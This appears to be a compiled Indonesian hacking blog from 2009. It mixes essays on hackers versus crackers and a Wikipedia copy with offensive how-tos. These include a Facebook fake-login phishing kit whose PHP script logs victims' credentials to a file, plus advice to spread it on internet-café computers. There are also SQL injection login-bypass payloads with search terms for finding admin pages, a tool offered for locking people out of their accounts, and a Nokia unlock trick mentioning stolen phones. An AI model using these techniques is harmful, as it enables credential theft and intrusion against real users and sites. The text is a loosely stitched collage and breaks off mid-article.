HACKER_CENTER

Apa Itu Hacker ??

Segelintir orang mungkih masih beranggapan bahwa hacker adalah orang yg suka merusak,merugikan,pembawa sial,gak punya aturan,dan hal² negatif lainnya.Tapi tahu kah anda arti Hacker yg sesungguh nya? apa saja hal yg di kerjakannya ? dari mana dia berasal ? dan apa saja inti dari pekerjaanya.Saya hanya ingin menjelaskan sedikit pengertian hacker dan aturan main yg saya ketahui dari berbagai nara sumber,termasuk dari teman² saya di forum.

Hacker julukan untuk orang yang penasaran bila dikatakan tidak ada celah diprogram kami, karena hacker tidak pernah percaya ada program yang sempurna.

• dapat melihat yang tidak bisa dilihat oleh admin,
• mengingatkan admin, bila terjadi celah pada system nya
• bukan lah pencuri (carder), perusak, atau penghancur.
• mempunyai kode etik
• berkembang seiring berkembangnya teknologi
• tidak ingin merasa hebat,
• tak pernah mudah menyerah untuk mencoba, karena pekerjaan kami jauh melampaui manusia biasa
• mencari informasi.
• sama dengan user, kami bayar bila main diwarnet, kami bermain internet (browsing, chatting, dll) Very Happy
• menjunjung solidaritas tinggi ilmu pengetahuan
• senang bermain-main dengan program

Penjelasan hacker:

• hitam sebab kami senang mempunyai ciri khas hitam,
• underground kami dianggap kaum bawah, karena kami tidak ingin dianggap hebat
• negatif kami senang melewati pintu belakang(backdoor)
• perusak kami bukan perusak, kami hanya memberitahukan admin
• musuh peradapan teknologi: karena kami maka ada perkembangan teknologi, tidak ada noda ya tidak belajar
• musuh kami bukan musuh yang harus dibasmi, karena kami orang hebat, dunia maya kami the winner, system kami yang the champion ,, kami sama dengan kalian, kami punya aturan, kami punya etika, kami punya hatinurani, dimana kesalah kami?

Dapat kita lihat semua kesimpulan di atas bahwa banyak perbedaan antara HACKER dan CRACKER.Tapi sebenarnya kemampuan mereka untuk mengakses komputer tidak beda jauh.Biasanya para Hacker ini lebih senang berbagi informasi,lain dengan Cracker yang suka menyimpan ilmu mereka untuk personal.

Nokia Unlock Master Code Generator

• Gak bisa buka HP?terkunci dan loe lupa passwordnya?
  Nyantai men,, biasa Tuh terjadi kalau loe udah rada pikun!wakawkawkakw!kidding*
  Nah...Tuh kan kalau kita nemu HP atau nyolong HP(yee..) gitu.Xixixixi!!gak tau Master code nya.Atau kalau di otak loe kebanyakan password yang loe ingat(password e-mail,Fs,Laptop,Dll alias dan lalu-lalu..xixixi).
  
  Nih tricknya:
  Ketikkan *#06# di HP loe,untuk mengetahui kode IMEI yang terdapat pada ponsel Nokia milik loe(sorry,,dapat inpo nya cuma HP nokia doank..JIakakaka).Kemudian buka situs Nokia Security Code Generator di SINI dan ketikkan kode IMEI yang yang sudah diketahui tadi pada form yang ada, setelah itu pilih Generate Code! untuk mengetahui nilai yang ingin dicari tadi.Nah..keluar deh tuh master code.Xixixixi...
  http://andrea-metropolix.blogspot.com/2008/10/apa-itu-hacker.html

Hacker its not our enemy

Juli 3, 2009 oleh Rohm4n

Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker berubah menjadi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Hacker memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa hackerlah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus dsb. Padahal, mereka adalah cracker. Crackerlah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para hacker dipahami dibagi menjadi 2 golongan White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.

Teknologi Informasi dilihat dari kata penyusunnya adalah teknologi dan informasi. Secara mudahnya teknologi informasi adalah hasil rekayasa manusia terhadap proses penyampaian informasi dari bagian pengirim ke penerima sehingga pengiriman informasi tersebut akan:

* lebih cepat

* lebih luas sebarannya, dan

* lebih lama penyimpanannya.

Agar lebih mudah memahaminya mari kita lihat perkembangan di bidang teknologi informasi. Pada awal sejarah, manusia bertukar informasi melalui bahasa. Maka bahasa adalah teknologi. Bahasa memungkinkan seseorang memahami informasi yang disampaikan oleh orang lain. Tetapi bahasa yang disampaikan dari mulut ke mulut hanya bertahan sebentar saja, yaitu hanya pada saat si pengirim menyampaikan informasi melalui ucapannya itu saja. Setelah ucapan itu selesai, maka informasi yang berada di tangan si penerima itu akan dilupakan dan tidak bisa disimpan lama. Selain itu jangkauan suara juga terbatas. Untuk jarak tertentu, meskipun masih terdengar, informasi yang disampaikan lewat bahasa suara akan terdegradasi bahkan hilang sama sekali.

Setelah itu teknologi penyampaian informasi berkembang melalui gambar. Dengan gambar jangkauan informasi bisa lebih jauh. Gambar ini bisa dibawa-bawa dan disampaikan kepada orang lain. Selain itu informasi yang ada akan bertahan lebih lama. Beberapa gambar peninggalan jaman purba masih ada sampai sekarang sehingga manusia sekarang dapat (mencoba) memahami informasi yang ingin disampaikan pembuatnya.

Ditemukannya alfabet dan angka arabik memudahkan cara penyampaian informasi yang lebih efisien dari cara yang sebelumnya. Suatu gambar yang mewakili suatu peristiwa dibuat dengan kombinasi alfabet, atau dengan penulisan angka, seperti MCMXLIII diganti dengan 1943. Teknologi dengan alfabet ini memudahkan dalam penulisan informasi itu.

Kemudian, teknologi percetakan memungkinkan pengiriman informasi lebih cepat lagi. Teknologi elektronik seperti radio, tv, komputer mengakibatkan informasi menjadi lebih cepat tersebar di area yang lebih luas dan lebih lama tersimpan.

Filsafat Pemrograman (1)

Istilah filsafat berasal dari bahasa Yunani : ”philosophia”. Seiring perkembangan jaman akhirnya dikenal juga dalam berbagai bahasa, seperti : ”philosophic” dalam kebudayaan bangsa Jerman, Belanda, dan Perancis; “philosophy” dalam bahasa Inggris; “philosophia” dalam bahasa Latin; dan “falsafah” dalam bahasa Arab.

Secara etimologi, istilah filsafat berasal dari bahasa Arab, yaitu falsafah atau juga dari bahasa Yunani yaitu philosophia – philien : cinta dan sophia : kebijaksanaan. Jadi bisa dipahami bahwa filsafat berarti cinta kebijaksanaan. Dan seorang filsuf adalah pencari kebijaksanaan, pecinta kebijaksanaan dalam arti hakikat.

Pengertian filsafat secara terminologi sangat beragam. Para filsuf merumuskan pengertian filsafat sesuai dengan kecenderungan pemikiran kefilsafatan yang dimilikinya. Seorang Plato mengatakan bahwa : Filsafat adalah pengetahuan yang berminat mencapai pengetahuan kebenaran yang asli. Sedangkan muridnya Aristoteles berpendapat kalau filsafat adalah ilmu ( pengetahuan ) yang meliputi kebenaran yang terkandung didalamnya ilmu-ilmu metafisika, logika, retorika, etika, ekonomi, politik, dan estetika. Lain halnya dengan Al Farabi yang berpendapat bahwa filsafat adalah ilmu ( pengetahuan ) tentang alam maujud bagaimana hakikat yang sebenarnya.

Imanuel Kant ( 1724 – 1804 ) : Filsafat adalah ilmu pengetahuan yange menjadi pokok dan pangkal dari segala pengetahuan yang didalamnya tercakup empat persoalan.

1. Apakah yang dapat kita kerjakan ?(jawabannya metafisika )
2. Apakah yang seharusnya kita kerjakan (jawabannya Etika )
3. Sampai dimanakah harapan kita ?(jawabannya Agama )
4. Apakah yang dinamakan manusia ? (jawabannya Antropologi )

Notonegoro: Filsafat menelaah hal-hal yang dijadikan objeknya dari sudut intinya yang mutlak, yang tetap tidak berubah , yang disebut hakekat.

Sidi Gazalba: Berfilsafat ialah mencari kebenaran dari kebenaran untuk kebenaran , tentang segala sesuatu yang di masalahkan, dengan berfikir radikal, sistematik dan universal.

Harold H. Titus (1979 ): (1) Filsafat adalah sekumpulan sikap dan kepecayaan terhadap kehidupan dan alam yang biasanya diterima secara tidak kritis. Filsafat adalah suatu proses kritik atau pemikiran terhadap kepercayaan dan sikap yang dijunjung tinggi; (2) Filsafat adalah suatu usaha untuk memperoleh suatu pandangan keseluruhan; (3) Filsafat adalah analisis logis dari bahasa dan penjelasan tentang arti kata dan pengertian ( konsep ); Filsafat adalah kumpulan masalah yang mendapat perhatian manusia dan yang dicirikan jawabannya oleh para ahli filsafat.

Dari semua pengertian filsafat secara terminologis di atas, dapat ditegaskan bahwa filsafat adalah ilmu pengetahuan yang menyelidiki dan memikirkan segala sesuatunya secara mendalam dan sungguh-sungguh, serta radikal sehingga mencapai hakikat segala situasi tersebut.

Logika adalah salah satu cabang ilmu filsafat yang ngebahas soal-soal seperti "apa itu pemikiran atau penalaran?", "bagaimana menalar yang benar?", "apa kriteria menalar yang benar?", "bagaimana menilai penalaran yang benar?", "apa saja batas-batas berpikir atau bernalar?", "apa saja kesalahan berpikir?", "apa hukum-hukum berpikir yang universal?", "bagaimana menyusun argumentasi yang logis?", dan lain-lain. Intinye, logika ialah filsafat berpikir atau filsafat bernalar.

Demikian pula dalam pemrograman, dibutuhkan pula filsafat (logika) ini untuk menentukan aspek program yang useable dan feaseable. filsafat inilah yang akan memberikan jalan terbaik untuk mencapai hasil terbaik. ALGORITMA, begitulah kami para programmer menyebutnya. hasil karya kami tidak akan memiliki makna apapun bahakan berantakan jika sebelumnya kami tidak memahami filosofi sistem yang hendak kami buat. desain simulasi tidak memiliki kekuatan untuk menampakkan kelebihannya jika algoritma ini tidak buat lebih optimal... dan dari algoritma inilah programmer bisa meramalkan seberapa lama programnya layak dipakai

Allow semuanya pa kabar ,,,

saya kembali hadir menyapa anda hanya untuk sekedar berbagi informasi saja, sebelumnya saya hanya seorang newbie yang sama-sama belajar, orang bilang aku lamer karena aku hanya bisa pake tool,

karena aku dah berusaha belajar program tapi gak bisa-bisa, tapi gak apa-apa lach kan kita sama-sama belajar, mari kita mulai pelajarannya ,,,,,,

1. PERSIAPAN

-Komputer

-Internet

-Kopi dan Roti/Camilan yg enk2

-Rokok (bagi yg perokok)

-Sedikit kemampuan komputer

-Tool yang saya sediakan

2. Cara memasak

Sebelum kita membahas lebih detail kita liat dulu yuuk tutorialnya, Mari kita siapkan tool yang kita miliki dengan mendownload di

http://www.4shared.com/file/115533155/540bb51a/GroundZeros_Account_Freezer_V10.html

Fitur tool:

Digunakan intuk Freezer Facebook, Windows Live, dan Account you tube.

Pendahuluan

Software ini bekerja agar account facebook, Windows live dan youtube anda agar tak bisa diakses oleh penguna e-mail tersebut dengan keterpaksaan harus mendaftar ulang

Cara Kerja

Cari Account apa yang akan di freeze, misalkan facebook

contoh gambarnya

MAsukkan account e-mailnya di kolom ini disini, liat gambar :

kemudian klik Freeze :

silahkan tunggu

beberapa saat.. Hasilnya, password si yang punya facebook akan berubah, dan dia tidak bisa kembali masuk ke dalam facebook-nya!!

Kacaukan kalo sampe facebook kita ter-freeze kayak seperti demikian

Gimana tasanya hari-hari lagi boomingnya facebook ech accounnya ilang

Duh, psti berat banget jaman sekarang ga bisa ngoprek facebook.

Soalnya, kalo hari ini ga buka facebook serasa mau mati?? yoyoyyo mati aja sana He..he..

Tapi mungkin ada sisi positif nya juga loh ney program. Kalo mau coba, silahkan. Praktekin aja ke akun mu sendiri, trus liat seberapa uring-uringan diri kamu tanpa facebook. Dari situ kita bisa melihat seberapa addicted diri kita terhadap facebook.

Aku sendiri sampe saat ini belum tahu betul bagaimana cara mengatasi masalah freeze ini, namun cara yang cukup aman, kita juga harus merahasiakan e-mail yang menjadi username kita.

Dengan menyembunyikan informasi e-mail tersebut, setidaknya selangkah lebih maju dalam menghindari bahaya korban dari keisengan orang atas akun facebook kita.

Dan ingat………..!, secara pribadi saya tidak bertanggung jawab atas segala hal yang diakibatkan dari program tersebut.

Semua menjadi tanggung jawab Anda sebagai pemakai. Maka gunakanlah dengan bijaksana….!

Perhatian

ini berguna jika menggunakan internet eksplorer

semoga bermanfaat,,

semoga sukses,,

Hi Hi Hi…selamat siang saudara sebangsa maupun tidak sebangsa. Saya lagi masuk angin hari ini, dan kata sumber yang tidak bisa dipercaya saya harus banyak-banyak tertawa untuk membuang angin. Karena itulah saya terpaksa banyak tertawa hari ini. Ha Ha Ha….. ha ha ha 13x.

Oke deh, saudara sebangsa maupun tidak sebangsa kita langsung saja masuk ke topik utama kita ya ? Yaitu cara mengatasi lupa password Deep Freeze 5 dan Deep Freeze 6. Mungkin topik ini sdah basi di kalangan para Master2 sekalian.

Yak..1….2….3…..Mulai.

Deep Freeze adalah salah satu program “pengaman” yang paling populer di warnet. Program ini memang cukup powerfull dalam menghadapi virus maupun tingkah laku usil pengunjung warnet. Apapun perubahan yang dilakukan oleh virus maupun pengunjung akan dikembalikan seperti kondisi semula oleh DF.

Sayangnya karena terlena oleh kemudahan ini, beberapa admin warnet kadang jadi lupa dengan password DF, akibatnya admin kebingungan ketika hendak menginstall program baru karena program tersebut akan ditendang lagi oleg Deep Freeze.

Berikut ini salah satu cara untuk mereset password DeepFreeze yang sudah saya coba dengan DF 5 dan DF 6.

Untuk DeepFreeze 5 :

1. Install Df di kompie lain yang tidak terproteksi dengan DF. Set passwordnya sesuka anda. Agar saat ini rekan-rekan dengan saya, kita anggap saja password barunya adalah “bakmi”(tanpa tanda kutip).

2. Untuk DF 5, password DF tersebut disimpan di file bernama Persi0.sys yang terletak di drive C Cara mereset passwordnya logikanya lumayan gampang seh : Kita replace saja file persi0.sys lama yang passwordnya kita lupa dengan file persi0.sys baru yang tentu saja passwordnya kita tahu karena baru saja kita buat.

3. Hanya saja sampe saat ini proses mereplace ini setahu saya ternyata nggak gampang-gampang amat karena belum ada yang bisa melakukan dalam normal windows. (Bagi rekan-rekan yang tahu caranya silakan memberi masukan ). File persi0.sys tidak mau ditindih dengan file persi0.sys baru dalam normal wondows karena terproteksi oleh DF yang sedang berjalan.

4. Karena file persi0.sys tidak bisa diganggu gugat dalam normal windows maka kita terpaksa mencari cara lain. Anda bisa mencoba memakai sistem operasi lain, sistem operasi portabel, dan sebagainya untuk mereplace file persi0.sys. Tetapi saya pribadi cukup puas dengan memakai Recovery Consol milik Windows XP Prof Edition.

5. Anggap saja kita memakai CD Windows XP Professional untuk masuk DOS versi XP(Recovery Console Windows XP). Restart komputer. Set BIOS untuk boot lewat CD. Tekan enter untuk masuk CD Windows. Tunggu sampai muncul tulisan Windows XP Professional Setup. Muncul 3 pilihan : To Setup Windows XP Now, press Enter ; To repair a Windows XP installation using Recovery Console, press R ; To quit setup without installing Windows XP, press F3. Pilih/tekan R (to repair) untuk masuk ke dalam Recovery Console

6. Isikan password admin anda. Bila dulu saat anda menginstall, tidak memasang password, tinggal tekan enter. Muncul prompt : C:Windows>

7. Copi file Persi0.sys dengan nama lain. Karena file Persi0.sys menyimpan password Bakmi, maka pada contoh ini file persi0.sys saya copi menjadi Bakmi.sys.

C:Windows> cd c: —- pindah direktori ke C:

C:>copy persi0.sys Bakmi.sys —- copi persi0.sys dengan nama lain

C:>exit —- keluar

8. Masuk windows normal, copikan file Bakmi.sys di komputer teman anda tersebut ke dala CD atau USB.

9. Selanjutnya masuk komputer anda yang DeepFreeze-nya terpassword. Copikan file bakmi.sys yang sudah anda buat ke dalam drive yang tidak diproteksi oleh DeepFreeze. Bila drive C diproteksi oleh DeepFreeze maka jangan masukkan bakmi.sys ke drive C, karena file ini akan dihapus oleh DeepFreeze. Anggap saja kita kopikan bakmi.sys ke drive D. Windows Recovery Console seperti cara sebelumnya. Rename file persi0.sys dengan nama lain. Copikan file bakmi.sys di drive D menjadi persi0.sys di drive C.

C:Windows>cd c: —– pindah direktori

C:>ren persi0.sys Cp_persi0.sys —– rename persi0.sys dengan nama lain

C:>copy d:Bakmi.sys c:persi0.sys —– copy file baru menjadi persi0.sys

C:>exit

Fake Login Facebook

Juli 13, 2009 oleh Rohm4n

Sedikit share soal pemaksaan pengambilan account facebbok menggunakan fakelogin

ini merupakan salah satu teknik pishing,

ga ush bertele telehe,

credit:www.700megs.com

knp saia buat creditnya yg diatas?? saia rekomendasikan temen2 buat account di http://www.700megs.com, karena saia liat ripway lgi bnyak kasus ktanya..xixixi…sekalian ngasi info klo http://www.700megs.com support .PHP jg low….hohoho,,,,

oke, saia anggap semua udh ngerti cara buat account nya. Setelah berhasil, masuk ke FILE MANAGER…hapus file index.html. (akan ada di Cpanel masing2 nantinya

klo udah, siapkan script berikut..
tdk perlu diedit, cos udh gw setting dan tinggal loe pakek

“http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd”>

Remember Me	Forgot your password?

Facebook helps you connect and share with the people in your life.

Sign Up

It’s free and anyone can join

Javascript is disabled on your browser.

Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.

Full Name:
Your Email:
New Password:
I am:	Select Sex:FemaleMale
Birthday:	Month:Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Day:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 Year:2009 2008 2007 2006 2005 2004 2003 2002 2001 2000 1999 1998 1997 1996 1995 1994 1993 1992 1991 1990 1989 1988 1987 1986 1985 1984 1983 1982 1981 1980 1979 1978 1977 1976 1975 1974 1973 1972 1971 1970 1969 1968 1967 1966 1965 1964 1963 1962 1961 1960 1959 1958 1957 1956 1955 1954 1953 1952 1951 1950 1949 1948 1947 1946 1945 1944 1943 1942 1941 1940 1939 1938 1937 1936 1935 1934 1933 1932 1931 1930 1929 1928 1927 1926 1925 1924 1923 1922 1921 1920 1919 1918 1917 1916 1915 1914 1913 1912 1911 1910 1909 1908 1907 1906 1905 1904 1903 1902 1901 1900
	Why do I need to provide this?

By clicking Sign Up, you are indicating that you have read and agree to the Terms of Use and Privacy Policy.

Security Check

This field is required.

Enter both words below, separated by a space.
Can’t read the words below? Try different words or an audio captcha.

Back to text.

Loading…

Text in the box:

What’s This?

Back

Registering…

An error occurred. Please try again.

Facebook © 2009

English (US)Espa�olFran�aisDeutsch????????????Catal�Ce�tinaCymraegDansk????????English (UK)Espa�ol (Espa�a)SuomiHrvatskiMagyarBahasa IndonesiaItaliano???Bahasa MelayuNorsk (bokm�l)NederlandsPolskiPortugu�s (Brasil)Portugu�s (Portugal)Rom�na???????Sloven�cina??????Svenska???????FilipinoT�rk�eTi?ng Vi?t??(??)??(??)??(??)

English (US)

• Login
• About
• Advertising
• Developers
• Jobs
• Terms

• Find Friends
• Privacy
• Help

target=”_top”>

save code diatas dengan index.html

kemudian

header(”Location:http://www.facebook.com/”);
$handle = fopen(”passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

save dengan nama write.php

upload kedua file index.html dan write.php ke dalam control panel di http://www.700megs.com masing

buat ngetes, buka dulu index html yg telah kalian upload dan login dri situ,
klo berhasil..akan ada file baru ; Password.txt

selesai dah..untuk penyebaranya silahkan dengan cara masing2…

disini gw cm ngasih contoh satu untuk pengambilan secara paksa account2 facebook mania..

buka file index di http://www.700megs.com kalian..ambil URL nya..

terus untuk pengguna firefox: buka tools>option>main

preview:

fungsingya agar browser waktu pertama kali dibuka langung mengarah ke file kita tadi…memungkinkan hasil buruan kalian lebih bnyak nantinya..

bole di sebar ke komputer temen/di warnet2 kesayangan…..wkwkwkwk,,,,

happy hunting…

jangan di salah gunakan, ni cuman sekedar pengetahuan saja,,,

Ditulis dalam hacking | Bertanda Fake Login Facebook, Hacking Facebook | 1 Komentar

Peretas

Dari Wikipedia bahasa Indonesia, ensiklopedia bebas

(Dialihkan dari Hacker)

Langsung ke: navigasi, cari

Peretas yang sering digambarkan sebagai seorang yang misterius

Peretas (Inggris: hacker) adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.

[sunting] Sejarah

Terminologi peretas muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai peretas, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Peretas sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Peretas sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Peretas sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi peretas.

Para peretas mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan peretas terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.

Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

[sunting] Hacker dalam film

Pada 1983 keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir AS.

Kemudian pada tahun 1995 keluarlah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan bagaimana akhirnya anak-anak muda tersebut mampu menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Salah satu pemainnya adalah Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.

Pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang. Dengan keluarnya dua film tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT.

[sunting] Lihat pula

• White hat hacker
• Black hat hacker
• Perangah

Belajar Hacker buat Pemula

halo kembali lagi nih, saya akan memberi tahu kan cara hacker dengan cara SQL Injection pasti ini udah pada tau nih, tapi yang belum tau boleh aja untuk belajar dan yang sudah tau untuk mengingat-ingat kembali, ini pernah saya lakukan dan sering saya lakukan dari jaman dulu, ternyata masih bisa di gunakan, Para pembuat Website kebanyakan sangat lupa atau malas dengan keamannannya banyak sekali website begitu mudah masuk atau seseorang dapat login kedalam sistem tanpa harus memiliki account, dan saya sering melakukan SQL injection untuk belajar dan mengetahui web tersebut bukan untuk merusak,selain itu juga SQL injection memungkinkan seseorang dapat merubah, menghapus atau menambah data-data yang berada di dalam database si website tersebut, bahkan bisa lebih parah lagi yaitu mematikan data base itu sendiri sehingga tidak bisa membirikan layanan kepada web server. oke sekarang kita masuk kedalam pokok bahasan pertama- tama yang kita siapkan adalah

1. Internet Exploler/mozilla firefox /browser lainnya
2. PC yang terhubung internet
3. kopi + cemilan + roko yang suka merokok sambil nyantai
4. tambahan lagi Program atau software yang pernah saya posting sebelumnya, tidak pake juga gak apa2 tapi lebih afdol lagi kalo pepatah orang tua jaman dulu hehe...he..he..

Stelah itu kita melakukan implementasi SQL Injection masuk ke google atau brwser yang lain dan masukanlah salah satu keyword berikut

1. "/admin.asp"
   "/login.asp"
   "/logon.asp"
   "/adminlogin.asp"
   "/adminlogon.asp"
   "/admin_login.asp"
   "/admin_logon.asp"
   "/admin/admin.asp"
   "/admin/login.asp"
   "/admin/logon.asp"
2. bukalah salah satu link yang ditemukan di google kemungkinan anda akan menjumpai sebuah halaman login seperti (user name dan Pasword)
3. Masukan kode berikut : User name : ` or `a'='a dan Pasword : ` or `a'='a ( termasuk tanda petiknya)
4. Jika ber hasil kemungkinan anda akamn masuk ke admin Panel di mana anda bisa menambahkan berita atau menggantinya bisa juga mendapatkan kredit card yang banyak
5. Jika tidak berhasil, coba anda mencari link yang lain yang ditemukan di google
6. banyak variasi kode antara lain :
   User name : admin
   Password : ` or `a'='a
7. Bisa juga di masukan kedua-duanya seperti

‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;

“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

8. mudah-mudahan berhasil yah dan jangan menyerah oke ini yang pernah saya lakukan dan berhasil dan masih banyak lagi nati saya sambung lagi

Wow, Hacker Telah Serang 200 Juta Pengguna Facebook

Hacker telah me-launching serangan untuk 200 juta pengguna Facebook, Kamis (14/5), dan hacker telah sukses mengumpulkan password dari jutaan user tersebut dalam rangka mencari mangsa member situs jejaring social tersebut. Juru bicara Facebook, Barry Schnitt, Kamis (14/5) mengungkapkan bahwa pihaknya sedang membersihkan kerusakan serangan tersebut. Schnitt menambahkan bahwa Facebook kini telah memblokir account yang sudah terkena serangan hacker ini. Namun, Schnitt menolak mengatakan berapa banyak account yang telah terinfeksi.


Hacker mendapatkan password melalui apa yang dinamakan serangan phishing, menjebol beberapa account member Facebook, kemudian mengirim email ke teman pengguna Facebook, dan membujuk user untuk mengklik link ke website palsu Facebook. Situs palsu Facebook tersebut didesain tampak sama seperti homepage Facebook. Member yang jadi korban akan didorong untuk login kembali ke situs tersebut, namun sebenarnya login ke website yang dikontrol oleh hacker, sambil menunggu password mereka. Pada dasarnya, menurut Schnitt, serangan hacker tersebut lebih kepada pencurian dan penyebaran spam.

Domain palsu Facebook adalah www.151.im, www.121.im, dan www.123.im. Namun, kini Facebook telah menghapus semua referensi ke domain-domain tersebut. Schnitt mengatakan bahwa tim Facebook mereka percaya bahwa hacker berusaha untuk mengumpulkan sejumlah besar hal rahasia user, termasuk password, kemudian menggunakan account mereka di lain waktu untuk mengirim spam berupa promosi obat kimia dan barang-barang lain ke member Facebook.

SQL Injection pada Joomla (hack Joomla)

Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika 'the choosen one' ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.

Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D~~

